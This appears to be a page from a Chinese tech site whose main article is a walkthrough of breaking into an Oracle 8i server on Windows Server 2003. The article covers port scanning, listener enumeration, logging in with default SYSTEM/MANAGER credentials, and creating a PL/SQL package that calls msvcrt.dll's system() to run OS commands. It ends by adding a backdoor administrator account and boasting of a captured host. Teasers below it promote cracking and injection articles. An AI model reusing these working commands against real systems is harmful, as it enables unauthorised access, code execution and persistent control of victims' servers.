oracle 8i版本怎么进行系统入侵的?系统入侵的步骤是什么?
最近看了些有关 Oracle 的安全资料,看后随手做了一个渗透测试,把过程记录下来方便日后查阅.。先用 SuperScan4.0 扫描下要测试的主机,速度很快,结果如图 1 所示:
图 1
端口 1521 是 Oracle 的 TNS Listener 默认监听的端口,通过扫描报告还可以看到 Oracle 的版本为 8i.现在还不 知道对方的操作系统版本,看到主机还开放了终端服务,直接连上去看下操作系统版本.如图 2,
图 2
确定操作系统版本为 Windows Server 2003 企业版。Oracle 10g 之前的版本默认情况下是允许远程管理 TNS Listener 的,这台主机的 Oracle 版本为 8i,我们通过 TNS Listenner 来收集下更多的详细信息.如果本地安装了 Oracle 可以直接调用 Lsnrctl 连接到测试的主机,如图 3 所示:
图 3
通过输入"status "命令我们可以得到 oracle 详细版本(8.1.70.0),操作系统(Windows),跟踪级别为 OFF(说明没 有开启审核),安全性为 OFF(说明没有设置 Listener 口令),日志文件的绝对路径(判断 Oracle 安装路径),数据库的 SID(ccdr).
要远程管理 Oracle, 需要知道 IP,数据库的 SID,和连接的用户名和密码.IP 和 SID 我们已经知道了. 接下来用oscanner 工具扫描下要测试主机是否存在默认的密码.如图 4 所示.
图 4
看来 管 理 员 安 装 完 Oracle8i 后就 没 有 进 行 进 一 步 的 安 全 配 置 , 所有 的 用 户 名 密 码 都 是 默 认 的 . 在
Oracle 中,SYS/SYSTEM 都是具有 DBA 权限的帐户,我这里选择使用 SYSTEM/MA NAGER 来连接数据库.
在本地用 Sqlplus 连接到目标 Oracle 数据库,命令为:
SqlPlus system/manager@//victimip:1521/ccdr,
连接成功 后,可以通过 PL/SQL 来运行 OS 命令,首先需要创建库来定位 msvcrt.dll 文件.这里需要使用完整的路径,通过刚才
对主机的 查点 我们 已经 知道 操作 系统为 win2003, 如果系统 安装 到 C 盘的话 , 那 msvcrt.dll 默认路径 就为
c:\windows\system32\msvcrt.dll.创建库的命令如下:
CREATE OR REPLACE LIBRARY exec_shell AS ’c:\windows\system32\msvcrt.dll’;
接下来写一个过程来调用 msvcrt.dll 里的 system()函数.命令如下:
CREATE OR REPLACE PACKAGE oracmd IS
PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
CREATE ORE REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec (cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
创建完后,就可以运行 OS 命令了.由于主机已经开放了终端服务,所以我这里添加个管理员,然后连接服务器.命 令如下:
exec oracmd.exec (’net user mickey imissyou /add’);
exec oracmd.exec (’net localgroup administrators mickey /add’);
帐户创建完成后,如图 5,就可以连接终端服务了,一台肉鸡到手了.:-)
图 5
mysql教程 mysql注入怎么获取web路径?
我们在MYSQL注入的时候经常会碰到无法立即根据在注入点加单引号提交得到的返回信息来获得web目录,这个时候获得web路径就要费点劲了!针对这种情况,我介绍三种方法!load_file(char(47))查找部分*nix系统的目录。a
详情2018-01-18 09:38:36责编:llp 来源:驱动管家wordpress下载默认自动更新造成超25%网站被黑
Wordfence最新漏洞造成大部分的网站被黑,Wordfence最近披露了某个影响范围很广的安全问题,大量WordPress网站都受到影响。这个漏洞利用的是WordPress的自动更新功能,此功能默认是开启的,又因为整个互联网上大
详情2018-01-21 21:11:40责编:llp 来源:驱动管家国内最受欢迎的编辑器之一:kindeditor编辑器如何遍历文件?
KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 KindEditor使用JavaScript编写,可以无缝的于Java、 NET、PHP
详情2018-01-23 11:05:31责编:llp 来源:驱动管家使用加密狗进行硬件保护的方法 加密狗怎么保护软件?
现在的解密技术排除法律和道德因素,就从学术角度来说是门科学。它与加密技术一样是相辅相成不断提高。 以下就针对使用加密狗(加密锁)进行硬件保护谈谈几点心得: 针对于使用加密狗的解密有什么方法? 1、硬件复制 复制硬件,即解密者复制Sentinel
详情2018-01-03 17:53:52责编:llp 来源:驱动管家处理webmail接口漏洞的邮件服务器surgemail
受影响系统: NetWin SurgeMail beta 39a NetWin SurgeMail
详情2018-01-03 09:06:24责编:llp 来源:驱动管家什么是ip欺骗?ip欺骗的原理
即使是很好的实现了TCP IP协议,由于它本身有着一些不安全的地方,从而可以对TCP IP网络进行攻击。这些攻击包括序列号欺骗,路由攻击,源地址欺骗和授权欺骗。本文除了介绍IP欺骗攻击方法外,还介绍怎样防止这个
详情2018-01-06 18:36:30责编:llp 来源:驱动管家web服务器的漏洞 web服务器的保护
Web安全分为两大类:· Web服务器的安全性(Web服务器本身安全和软件配置)。· Web应用程序的安全性(在Web服务器上运行的Java、 ActiveX、PHP、ASP代码的安全)。Web服务器面临的攻击Web服务器攻击利用Web服务器
详情2018-01-08 19:52:37责编:llp 来源:驱动管家网吧破解怎么做?怎么破解网吧?
解万象秘笈 一 用Alt Ctrl Del组合键(万象) 开机后,当出现蓝背景时,立即按组合键,弹出“关闭程序”对话框,若里面有“client”后则立即关闭,当发现“未知”程序时也要关闭,因为万象会启动两次。万象被结束了,
详情2018-01-05 09:14:06责编:llp 来源:驱动管家钓鱼网站链接出现是因为网页浏览器未过滤@字符
常用浏览器未过滤“@”字符或导致钓鱼网站链接,为了防止出现类似事情,还需要及时过滤掉
详情2018-01-17 10:25:06责编:llp 来源:驱动管家恶意网站是什么网站?恶意网站的相关知识
当我们在访问一些网站是会弹出一些提示,有时候QQ管家、金山毒霸是经常弹出访问提示,不注意就会扣掉很多钱,那么真正的恶意网站又是怎么一回事,又有多少人彻底的明白呢?一起来看看吧。| 前言恶意网站在大家平
详情2018-01-12 15:27:06责编:llp 来源:驱动管家
- 百度手机助手下载后怎么安装?如何安装百度手机助手?
- 暴风影音播放器广告怎么去?暴风影音播放器可以免费去广告吗?
- 手机在连接wifi的时候wifi身份验证出现问题解决方法
- 关于HP打印机各型号恢复出厂设置的方法介绍
- 计算机电源:电脑的系统电源使用效率怎么检查?
- mac系统设置进入休眠模式的操作方法是什么
- 哪几款iPhone6手机壳值得推荐?这四款iphone6手机壳值得买
- 手机上网怎么省流量?用户降低流量消耗有哪些技巧?
- 电脑桌面背景怎么设置?小白怎么设置电脑桌面背景?
- 财付通怎么注销账户?财付通怎么彻底关闭?
- 什么是cuteftp?cuteftp 4.0版本怎么破解?
- 挖掘鸡配置 挖掘鸡入侵传奇sf图解
- 为什么吉吉影音播放器频繁闪退?吉吉影音播放器闪退怎么解决?
- ArcMap绘图软件怎么用?ArcMap绘图软件绘制小区面层图形教程
- 造成手机充电时充电器发热的原因以及解决方法介绍
- ipad要清除里面的东西怎么恢复出厂设置
- xp系统电脑的鼠标右键不能复制有什么办法解决
- 怎么查找电脑系统里面的局域网共享文件夹
- 小米3屏幕出问题:小米3屏幕失灵没反应怎么办?
- 蓝牙耳机怎么听歌?这里有苹果6连接蓝牙耳机听歌的方法